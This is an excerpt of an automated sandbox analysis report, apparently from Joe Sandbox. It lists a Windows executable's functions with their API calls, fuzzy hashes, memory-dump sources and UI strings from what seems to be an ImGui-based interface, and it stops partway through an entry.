                  • Opcode Fuzzy Hash: d6ca420bdbc43312870783dfaaf2f5885d8e2e0dfa232003c2f7a903dbbc6879
                  • Instruction Fuzzy Hash: 63B17322E28BCC41E223963755821F9E250AFBF3C5F2DEB23F984756B2AF2461D55640
                  APIs
                    • Part of subcall function 00007FF69DD1D2B0: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF69DCD8FA8), ref: 00007FF69DD1D2C0
                    • Part of subcall function 00007FF69DD1CF50: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF69DCD2E7C), ref: 00007FF69DD1CF6A
                    • Part of subcall function 00007FF69DD1D244: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF69DCD8FFA), ref: 00007FF69DD1D254
                    • Part of subcall function 00007FF69DD1D244: ReleaseSRWLockExclusive.KERNEL32(?,?,00000000,00007FF69DCD8FFA), ref: 00007FF69DD1D294
                  • memchr.VCRUNTIME140 ref: 00007FF69DD0E94E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: ExclusiveLock$Acquire$Releasemallocmemchr
                  • String ID: %*s%.*s$[ ]$[x]$[~]$f?$f?
                  • API String ID: 39189341-3851841075
                  • Opcode ID: ba4eec59af03c91fc8b93263035885d6c55483d4595ad1571de8d3ee06724afe
                  • Instruction ID: 3c767ea2fe2d3296687694b99377ab3c32b984d17d3d217fc3ea5f9c060e888c
                  • Opcode Fuzzy Hash: ba4eec59af03c91fc8b93263035885d6c55483d4595ad1571de8d3ee06724afe
                  • Instruction Fuzzy Hash: E6521832A08B8585F721CB36D4452B977A4FF99388F146371DB8C972A1EF38E589CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove
                  • String ID: ##ColorButton$P$alpha$hue
                  • API String ID: 2162964266-3924949270
                  • Opcode ID: c6ab6229cfd8c8d85168a48bd6acd6b626c15bc0721365489076767d47f57043
                  • Instruction ID: 96d0264a6642efffed3935f25703cb02986da9501e3e7926250a019a60c74607
                  • Opcode Fuzzy Hash: c6ab6229cfd8c8d85168a48bd6acd6b626c15bc0721365489076767d47f57043
                  • Instruction Fuzzy Hash: ADF2F833E18B8596E321CB36D4411B9B760FF59788F146775EA8CA36A5EF38E185CB00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: ##picker$[popup] OpenPopup("%s" -> 0x%08X)$_COL3F$_COL4F$picker
                  • API String ID: 0-2733792156
                  • Opcode ID: 22182ddcd517bfa2aaaceeccf23985cb262d96e7ac05302ef90a0da6347c3a4d
                  • Instruction ID: 4df740d11ef0f965d9c79ad22297b0392ebaae14cfae61b5e5873e55eeb924ad
                  • Opcode Fuzzy Hash: 22182ddcd517bfa2aaaceeccf23985cb262d96e7ac05302ef90a0da6347c3a4d
                  • Instruction Fuzzy Hash: 7E72DF32A08B86D6E725CF26D5412BD77A0FB59748F04A375DB8C972A1EF38E589C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: malloc$freememmove
                  • String ID: Table$Window
                  • API String ID: 3044343941-616867329
                  • Opcode ID: 8667158f06e70eeba7fc3919cba9b345e667100d5adaf53ad9eca0c8f4106bb1
                  • Instruction ID: 46c5a58557f65fdd68224c953c13aeaeff2629a6b5d60129ea4e29136d3f6369
                  • Opcode Fuzzy Hash: 8667158f06e70eeba7fc3919cba9b345e667100d5adaf53ad9eca0c8f4106bb1
                  • Instruction Fuzzy Hash: 5CC18276A15B81CAEB24CF24E4802AD73B8FB54744F549276CB8D53764EF38E466D340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: freemallocmemset
                  • String ID:
                  • API String ID: 3809226132-0
                  • Opcode ID: 22bc8b132c65eacb2779380cf1ad717794157077756cdf149bbc392bed9adff6
                  • Instruction ID: e3d31d42aced230d6ba4db4ab708adc5ea8d6a7df4d5d87e78ca5c3d2285cd4d
                  • Opcode Fuzzy Hash: 22bc8b132c65eacb2779380cf1ad717794157077756cdf149bbc392bed9adff6
                  • Instruction Fuzzy Hash: 55D18032A09A85C6E7758F2AE0452B9B3A4FF98784F149331DB8953764EF38E546DB00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: powf$AsyncQuery_perf_counterQuery_perf_frequencyState
                  • String ID:
                  • API String ID: 2084314608-0
                  • Opcode ID: c3ef311e766bf4cfddbece6ba78f5c5dddba1bb6957c82e9bbe0f1b1d4e26db6
                  • Instruction ID: 2dca19b3d12604894a51bd7021e4b889ba743315c298ee5c1500e40f23ab623a
                  • Opcode Fuzzy Hash: c3ef311e766bf4cfddbece6ba78f5c5dddba1bb6957c82e9bbe0f1b1d4e26db6
                  • Instruction Fuzzy Hash: C0B1A521E58A8589F732CF75E4403BD63B4EF5A348F145373D98DA6A65EF3CA0868740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                  • String ID:
                  • API String ID: 2933794660-0
                  • Opcode ID: 7cb0d5effa3d44b21a8bf66d9394127f991ea29c5300890e090e1cf2c7bea9fc
                  • Instruction ID: a04838e0ea630ba34ddc28960b4af8d3ac937276dc0e9310763b1476039ed047
                  • Opcode Fuzzy Hash: 7cb0d5effa3d44b21a8bf66d9394127f991ea29c5300890e090e1cf2c7bea9fc
                  • Instruction Fuzzy Hash: 32113022B54F058AEB10CF60E9552B833A4FB19758F441E31DAAD86BA4EF7CD1598380
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: <NULL>$[nav] NavInitRequest: from move, window "%s", layer=%d$[nav] NavMoveRequest: clamp NavRectRel for gamepad move$[nav] NavMoveRequestForward %d
                  • API String ID: 0-586442257
                  • Opcode ID: 1e86e0c2e8f6a7c249bb0d5afaea3a0b92c8c4bb246655ee769c12252b02b711
                  • Instruction ID: 189384f17dd85f97f15c8494e103bf51917e3ae21883e420c746d0224d21df20
                  • Opcode Fuzzy Hash: 1e86e0c2e8f6a7c249bb0d5afaea3a0b92c8c4bb246655ee769c12252b02b711
                  • Instruction Fuzzy Hash: DB621C32D297CAC5E633DA3B81452F57268EF29394F298771EB98721E1EF3574825700
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: da66a6c48438cdbf9ac1ea07bf697faa4b8f2ba4bbfd717e473e6c4fca8e700e
                  • Instruction ID: 5b6c221c2e319c43f81aed458ba01004a51a093e14724cec90c3fe3c2595aabd
                  • Opcode Fuzzy Hash: da66a6c48438cdbf9ac1ea07bf697faa4b8f2ba4bbfd717e473e6c4fca8e700e
                  • Instruction Fuzzy Hash: 70130572A087C5D7E72ACA3682413B9B7B4FF59344F089735DB98A3591EF38B4A18710
                  APIs
                  • memset.VCRUNTIME140 ref: 00007FF69DCF1707
                    • Part of subcall function 00007FF69DCFAAC0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAAF2
                    • Part of subcall function 00007FF69DCFAAC0: memmove.VCRUNTIME140 ref: 00007FF69DCFAB0D
                    • Part of subcall function 00007FF69DCFAAC0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAB2D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: freemallocmemmovememset
                  • String ID: Processed$Remaining
                  • API String ID: 1050734653-3602939160
                  • Opcode ID: ae8af059040b749f839b3a34f9533b956f9dcb40868c172b4773ad3f9a0cb39b
                  • Instruction ID: 19d8f777a633fbf9f4da2eef3b02b82f109b06b3a58d24e246ebcb1196cf4186
                  • Opcode Fuzzy Hash: ae8af059040b749f839b3a34f9533b956f9dcb40868c172b4773ad3f9a0cb39b
                  • Instruction Fuzzy Hash: D4F12273A086C286EB35CF2981003B977B9FB55B88F184275CE8DCB684EF39E4599750
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(?,?,00000000,00007FF69DD1D429), ref: 00007FF69DD1D333
                  • UnhandledExceptionFilter.KERNEL32(?,?,00000000,00007FF69DD1D429), ref: 00007FF69DD1D33C
                  • GetCurrentProcess.KERNEL32(?,?,00000000,00007FF69DD1D429), ref: 00007FF69DD1D342
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$CurrentProcess
                  • String ID:
                  • API String ID: 1249254920-0
                  • Opcode ID: 5b6a3c17b55125c6775a9b7c63cb7aa094d7a82e23c4fa19ceec3a8ab49f6658
                  • Instruction ID: 9e1c3476ea2d88f25835cedfe22c13ab35a560f2c42f9956238c8a2c091d14cd
                  • Opcode Fuzzy Hash: 5b6a3c17b55125c6775a9b7c63cb7aa094d7a82e23c4fa19ceec3a8ab49f6658
                  • Instruction Fuzzy Hash: FED0C751E08606C6FB6A17716D160361210EB5DB49F042174CB4FC5324FD3C548F8740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove$memset
                  • String ID:
                  • API String ID: 3790616698-0
                  • Opcode ID: 778508e9aa91e4ce399c97c248fabfe0b4cbd273bb200c76b3b24970647e821d
                  • Instruction ID: 6a2a17754708956bc40f517f321011eb88e028e6165ebe3348f15cb7dfabfe31
                  • Opcode Fuzzy Hash: 778508e9aa91e4ce399c97c248fabfe0b4cbd273bb200c76b3b24970647e821d
                  • Instruction Fuzzy Hash: 5C523576604AC58ADB20CF2AD9846ED77B4FB89B88F058226DF4E47B28DF39D545C700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free$ceilfmalloc
                  • String ID:
                  • API String ID: 1608849232-0
                  • Opcode ID: 9ebc3f8791c6b8289bf8c8e7f4067a69604b92e1bd160a509c815b8c2034e534
                  • Instruction ID: 753140924940f02c262a1b61f86bb3ad12b4c54247477ff6e38cfe5cc03f3ab6
                  • Opcode Fuzzy Hash: 9ebc3f8791c6b8289bf8c8e7f4067a69604b92e1bd160a509c815b8c2034e534
                  • Instruction Fuzzy Hash: 53129032A186948AE721CB35D4406ADB7A4FF9D784F159336EE8993754EF38E581CB00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: #Child$%s/%08X$%s/%s_%08X
                  • API String ID: 0-2123028019
                  • Opcode ID: 6564603271906744a084b27cebc27f8ee116fdee1f550b92d9015f8f65120e3a
                  • Instruction ID: a3b0434b19074a6ff533585679e3112449d7152961ff8f071ade26dfa5a1ae67
                  • Opcode Fuzzy Hash: 6564603271906744a084b27cebc27f8ee116fdee1f550b92d9015f8f65120e3a
                  • Instruction Fuzzy Hash: 7A6115A2908785D6E735CF3294422BDB2B8FF55344F049332DB9993191EF3CE8A68B10
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: freemalloc
                  • String ID:
                  • API String ID: 3061335427-0
                  • Opcode ID: ad0d56921161f60f4fee7998089b0a0993db810df0f01b13ce22bf7f1f26bb7b
                  • Instruction ID: 044924aae05d24a167d5eceb75ffe84168a78e02af203498a4363b7f461fdd92
                  • Opcode Fuzzy Hash: ad0d56921161f60f4fee7998089b0a0993db810df0f01b13ce22bf7f1f26bb7b
                  • Instruction Fuzzy Hash: 8EA25B33925B8886C712CF3BD481168B764FFADB88B19D726DE4863771EB25E494DB00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: malloc$ExclusiveLockfreememmove$AcquireRelease
                  • String ID: ##Combo_%02d$#ComboPopup
                  • API String ID: 1632963668-3270323658
                  • Opcode ID: bda35faa3c674d777a5577ed3cece6df080ab1f69d092ef411a26436bbd495f4
                  • Instruction ID: 73d50108897733339a5471fa1384400f000c8e9e4695d2cb69b3bc5092b25356
                  • Opcode Fuzzy Hash: bda35faa3c674d777a5577ed3cece6df080ab1f69d092ef411a26436bbd495f4
                  • Instruction Fuzzy Hash: 7572E472E18B8585E721CF36D4401BDB3A0FB99788F14A375EE8C66665EF38E449CB40
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: ##NavUpdateWindowing$[popup] ClosePopupsOverWindow("%s")
                  • API String ID: 0-1315485432
                  • Opcode ID: 672408678cec5f83d36abe98d6bf50dd330f28e57f5041c14d83c66613f96086
                  • Instruction ID: 272300be31655aa81af6c0d7103fad8426bb3f3ef52edd0724b34a12ad508d3a
                  • Opcode Fuzzy Hash: 672408678cec5f83d36abe98d6bf50dd330f28e57f5041c14d83c66613f96086
                  • Instruction Fuzzy Hash: 36520666A08686C6EB398B3991403F973B8FF46304F089675CBD9936D1EF3CB4669704
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: freemalloc
                  • String ID:
                  • API String ID: 3061335427-0
                  • Opcode ID: fd0e62a8e76811c1a5d20c2e7b3a4aac73a0ec4fc291562b24cebab7bf40d794
                  • Instruction ID: f1281177d4c45d6f24a8eddcf0c2014e6ccbd1e74ef3e32fc45622f4af14011d
                  • Opcode Fuzzy Hash: fd0e62a8e76811c1a5d20c2e7b3a4aac73a0ec4fc291562b24cebab7bf40d794
                  • Instruction Fuzzy Hash: 36910432A1968596DB21CB3AD1007B9B360FF997C5F14E332DE89A2755FF38E0498740
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: #RESIZE
                  • API String ID: 0-1383961720
                  • Opcode ID: bc47c7a02d6bc9ceae6539735f87a977b97de62de314a3841b1bcd4872301e06
                  • Instruction ID: f4cc23dcf7c29a24434ef0fba19d6e517e1b62f16a6c9a84ed644ee0f9c9d087
                  • Opcode Fuzzy Hash: bc47c7a02d6bc9ceae6539735f87a977b97de62de314a3841b1bcd4872301e06
                  • Instruction Fuzzy Hash: E562EC73D18789CAE362CB3790421B9B374EF5D384F199731EA89B25A1EF38B5459B00
                  Strings
                  • [nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s", xrefs: 00007FF69DCF5227
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
